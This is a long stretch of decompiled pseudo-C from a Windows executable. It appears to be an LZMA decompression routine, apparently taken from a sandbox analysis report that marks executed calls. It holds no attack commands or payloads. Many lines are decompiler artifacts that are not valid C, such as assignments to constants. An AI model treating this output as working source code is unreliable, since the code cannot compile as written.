                                                                                                                      							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                      								_t97 = __ebp - 0x38;
                                                                                                                      								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							 *(__ebp - 0x38) = 0;
                                                                                                                      						}
                                                                                                                      						if( *(__ebp - 0x34) == __edx) {
                                                                                                                      							__ebx = 0;
                                                                                                                      							__ebx = 1;
                                                                                                                      							L60:
                                                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                                                      							__edx = __ebx + __ebx;
                                                                                                                      							__ecx =  *(__ebp - 0x10);
                                                                                                                      							__esi = __edx + __eax;
                                                                                                                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								__ebx = __edx + 1;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      								L59:
                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                      									goto L54;
                                                                                                                      								}
                                                                                                                      								goto L60;
                                                                                                                      							} else {
                                                                                                                      								L57:
                                                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                                                      									 *(__ebp - 0x88) = 0xf;
                                                                                                                      									goto L170;
                                                                                                                      								}
                                                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      								_t202 = __ebp - 0x70;
                                                                                                                      								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      								goto L59;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 8);
                                                                                                                      							__ebx = 0;
                                                                                                                      							__ebx = 1;
                                                                                                                      							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                      							L40:
                                                                                                                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                      							 *(__ebp - 0x48) = __eax;
                                                                                                                      							__eax = __eax + 1;
                                                                                                                      							__eax = __eax << 8;
                                                                                                                      							__eax = __eax + __ebx;
                                                                                                                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                      							__edx = __ax & 0x0000ffff;
                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								 *(__ebp - 0x40) = 1;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__ebx = __ebx + __ebx + 1;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      							} else {
                                                                                                                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                      								0x800 = 0x800 - __edx;
                                                                                                                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							 *(__ebp - 0x44) = __ebx;
                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      								L38:
                                                                                                                      								__eax =  *(__ebp - 0x40);
                                                                                                                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                      									while(1) {
                                                                                                                      										if(__ebx >= 0x100) {
                                                                                                                      											break;
                                                                                                                      										}
                                                                                                                      										__eax =  *(__ebp - 0x58);
                                                                                                                      										__edx = __ebx + __ebx;
                                                                                                                      										__ecx =  *(__ebp - 0x10);
                                                                                                                      										__esi = __edx + __eax;
                                                                                                                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      										__ax =  *__esi;
                                                                                                                      										 *(__ebp - 0x54) = __esi;
                                                                                                                      										__edi = __ax & 0x0000ffff;
                                                                                                                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      											__cx = __ax;
                                                                                                                      											__ebx = __edx + 1;
                                                                                                                      											__cx = __ax >> 5;
                                                                                                                      											 *__esi = __ax;
                                                                                                                      										} else {
                                                                                                                      											 *(__ebp - 0x10) = __ecx;
                                                                                                                      											0x800 = 0x800 - __edi;
                                                                                                                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      											__ebx = __ebx + __ebx;
                                                                                                                      											 *__esi = __cx;
                                                                                                                      										}
                                                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                                                      										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                      											L45:
                                                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                                                      												goto L170;
                                                                                                                      											}
                                                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      											_t155 = __ebp - 0x70;
                                                                                                                      											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L53:
                                                                                                                      									_t172 = __ebp - 0x34;
                                                                                                                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                      									L54:
                                                                                                                      									__al =  *(__ebp - 0x44);
                                                                                                                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                      									L55:
                                                                                                                      									if( *(__ebp - 0x64) == 0) {
                                                                                                                      										 *(__ebp - 0x88) = 0x1a;
                                                                                                                      										goto L170;
                                                                                                                      									}
                                                                                                                      									__ecx =  *(__ebp - 0x68);
                                                                                                                      									__al =  *(__ebp - 0x5c);
                                                                                                                      									__edx =  *(__ebp - 8);
                                                                                                                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                      									 *( *(__ebp - 0x68)) = __al;
                                                                                                                      									__ecx =  *(__ebp - 0x14);
                                                                                                                      									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                      									__eax = __ecx + 1;
                                                                                                                      									__edx = 0;
                                                                                                                      									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                      									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                      									__edx = _t191;
                                                                                                                      									L79:
                                                                                                                      									 *(__ebp - 0x14) = __edx;
                                                                                                                      									L80:
                                                                                                                      									 *(__ebp - 0x88) = 2;
                                                                                                                      									goto L1;
                                                                                                                      								}
                                                                                                                      								if(__ebx >= 0x100) {
                                                                                                                      									goto L53;
                                                                                                                      								}
                                                                                                                      								goto L40;
                                                                                                                      							} else {
                                                                                                                      								L36:
                                                                                                                      								if( *(__ebp - 0x6c) == 0) {
                                                                                                                      									 *(__ebp - 0x88) = 0xd;
                                                                                                                      									L170:
                                                                                                                      									_t568 = 0x22;
                                                                                                                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                      									_t535 = 0;
                                                                                                                      									L172:
                                                                                                                      									return _t535;
                                                                                                                      								}
                                                                                                                      								__ecx =  *(__ebp - 0x70);
                                                                                                                      								__eax =  *(__ebp - 0xc);
                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      								_t121 = __ebp - 0x70;
                                                                                                                      								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      								goto L38;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					L1:
                                                                                                                      					_t534 =  *(_t614 - 0x88);
                                                                                                                      					if(_t534 > 0x1c) {
                                                                                                                      						L171:
                                                                                                                      						_t535 = _t534 | 0xffffffff;
                                                                                                                      						goto L172;
                                                                                                                      					}
                                                                                                                      					switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
                                                                                                                      						case 0:
                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                      							_t534 =  *( *(_t614 - 0x70));
                                                                                                                      							if(_t534 > 0xe1) {
                                                                                                                      								goto L171;
                                                                                                                      							}
                                                                                                                      							_t538 = _t534 & 0x000000ff;
                                                                                                                      							_push(0x2d);
                                                                                                                      							asm("cdq");
                                                                                                                      							_pop(_t570);
                                                                                                                      							_push(9);
                                                                                                                      							_pop(_t571);
                                                                                                                      							_t610 = _t538 / _t570;
                                                                                                                      							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                      							asm("cdq");
                                                                                                                      							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                      							 *(_t614 - 0x3c) = _t605;
                                                                                                                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                      								L10:
                                                                                                                      								if(_t613 == 0) {
                                                                                                                      									L12:
                                                                                                                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                      									goto L15;
                                                                                                                      								} else {
                                                                                                                      									goto L11;
                                                                                                                      								}
                                                                                                                      								do {
                                                                                                                      									L11:
                                                                                                                      									_t613 = _t613 - 1;
                                                                                                                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                      								} while (_t613 != 0);
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							if( *(_t614 - 4) != 0) {
                                                                                                                      								GlobalFree( *(_t614 - 4));
                                                                                                                      							}
                                                                                                                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                      							 *(_t614 - 4) = _t534;
                                                                                                                      							if(_t534 == 0) {
                                                                                                                      								goto L171;
                                                                                                                      							} else {
                                                                                                                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                      								goto L10;
                                                                                                                      							}
                                                                                                                      						case 1:
                                                                                                                      							L13:
                                                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                      								 *(_t614 - 0x88) = 1;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                      							_t45 = _t614 - 0x48;
                                                                                                                      							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                      							__eflags =  *_t45;
                                                                                                                      							L15:
                                                                                                                      							if( *(_t614 - 0x48) < 4) {
                                                                                                                      								goto L13;
                                                                                                                      							}
                                                                                                                      							_t546 =  *(_t614 - 0x40);
                                                                                                                      							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                      								L20:
                                                                                                                      								 *(_t614 - 0x48) = 5;
                                                                                                                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                      								goto L23;
                                                                                                                      							}
                                                                                                                      							 *(_t614 - 0x74) = _t546;
                                                                                                                      							if( *(_t614 - 8) != 0) {
                                                                                                                      								GlobalFree( *(_t614 - 8));
                                                                                                                      							}
                                                                                                                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                      							 *(_t614 - 8) = _t534;
                                                                                                                      							if(_t534 == 0) {
                                                                                                                      								goto L171;
                                                                                                                      							} else {
                                                                                                                      								goto L20;
                                                                                                                      							}
                                                                                                                      						case 2:
                                                                                                                      							L24:
                                                                                                                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                      							 *(_t614 - 0x84) = 6;
                                                                                                                      							 *(_t614 - 0x4c) = _t553;
                                                                                                                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                      							goto L132;
                                                                                                                      						case 3:
                                                                                                                      							L21:
                                                                                                                      							__eflags =  *(_t614 - 0x6c);
                                                                                                                      							if( *(_t614 - 0x6c) == 0) {
                                                                                                                      								 *(_t614 - 0x88) = 3;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                      							_t67 = _t614 - 0x70;
                                                                                                                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                      							__eflags =  *_t67;
                                                                                                                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                      							L23:
                                                                                                                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                      							if( *(_t614 - 0x48) != 0) {
                                                                                                                      								goto L21;
                                                                                                                      							}
                                                                                                                      							goto L24;
                                                                                                                      						case 4:
                                                                                                                      							goto L133;
                                                                                                                      						case 5:
                                                                                                                      							goto L137;
                                                                                                                      						case 6:
                                                                                                                      							goto L0;
                                                                                                                      						case 7:
                                                                                                                      							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                      							if( *(__ebp - 0x40) != 1) {
                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                      								 *(__ebp - 0x80) = 0x16;
                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      								__eax =  *(__ebp - 0x28);
                                                                                                                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                                                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      								__eax = 0;
                                                                                                                      								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      								__al = __al & 0x000000fd;
                                                                                                                      								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								 *(__ebp - 0x58) = __eax;
                                                                                                                      								goto L68;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 4);
                                                                                                                      							__ecx =  *(__ebp - 0x38);
                                                                                                                      							 *(__ebp - 0x84) = 8;
                                                                                                                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                      							goto L132;
                                                                                                                      						case 8:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                      								 *(__ebp - 0x84) = 0xa;
                                                                                                                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                      							} else {
                                                                                                                      								__eax =  *(__ebp - 0x38);
                                                                                                                      								__ecx =  *(__ebp - 4);
                                                                                                                      								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                      								 *(__ebp - 0x84) = 9;
                                                                                                                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                      							}
                                                                                                                      							goto L132;
                                                                                                                      						case 9:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								goto L89;
                                                                                                                      							}
                                                                                                                      							__eflags =  *(__ebp - 0x60);
                                                                                                                      							if( *(__ebp - 0x60) == 0) {
                                                                                                                      								goto L171;
                                                                                                                      							}
                                                                                                                      							__eax = 0;
                                                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                      							__eflags = _t258;
                                                                                                                      							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                      							goto L75;
                                                                                                                      						case 0xa:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                      								goto L132;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                                                      							goto L88;
                                                                                                                      						case 0xb:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                      							} else {
                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                      							L88:
                                                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                      							L89:
                                                                                                                      							__eax =  *(__ebp - 4);
                                                                                                                      							 *(__ebp - 0x80) = 0x15;
                                                                                                                      							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                      							goto L68;
                                                                                                                      						case 0xc:
                                                                                                                      							L99:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t334 = __ebp - 0x70;
                                                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t334;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                                                      							goto L101;
                                                                                                                      						case 0xd:
                                                                                                                      							goto L36;
                                                                                                                      						case 0xe:
                                                                                                                      							goto L45;
                                                                                                                      						case 0xf:
                                                                                                                      							goto L57;
                                                                                                                      						case 0x10:
                                                                                                                      							L109:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t365 = __ebp - 0x70;
                                                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t365;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							goto L111;
                                                                                                                      						case 0x11:
                                                                                                                      							L68:
                                                                                                                      							__esi =  *(__ebp - 0x58);
                                                                                                                      							 *(__ebp - 0x84) = 0x12;
                                                                                                                      							goto L132;
                                                                                                                      						case 0x12:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                      								goto L132;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      							__eflags = __eax;
                                                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                      							goto L130;
                                                                                                                      						case 0x13:
                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                      								_t469 = __ebp - 0x58;
                                                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                      								__eflags =  *_t469;
                                                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                                                      								L144:
                                                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                                                      								goto L145;
                                                                                                                      							}
                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                      							L130:
                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                                                      							goto L144;
                                                                                                                      						case 0x14:
                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                                                      							goto L140;
                                                                                                                      						case 0x15:
                                                                                                                      							__eax = 0;
                                                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      							__al = __al & 0x000000fd;
                                                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      							goto L120;
                                                                                                                      						case 0x16:
                                                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                                                      							__eflags = __eax - 4;
                                                                                                                      							if(__eax >= 4) {
                                                                                                                      								_push(3);
                                                                                                                      								_pop(__eax);
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 4);
                                                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                                                      							__eax = __eax << 7;
                                                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                      							goto L145;
                                                                                                                      						case 0x17:
                                                                                                                      							L145:
                                                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                      							goto L149;
                                                                                                                      						case 0x18:
                                                                                                                      							L146:
                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                                                      								goto L170;
                                                                                                                      							}
                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							_t484 = __ebp - 0x70;
                                                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                      							__eflags =  *_t484;
                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      							L148:
                                                                                                                      							_t487 = __ebp - 0x48;
                                                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                      							__eflags =  *_t487;
                                                                                                                      							L149:
                                                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                                                      								0 = 1;
                                                                                                                      								__eax = 1 << __cl;
                                                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
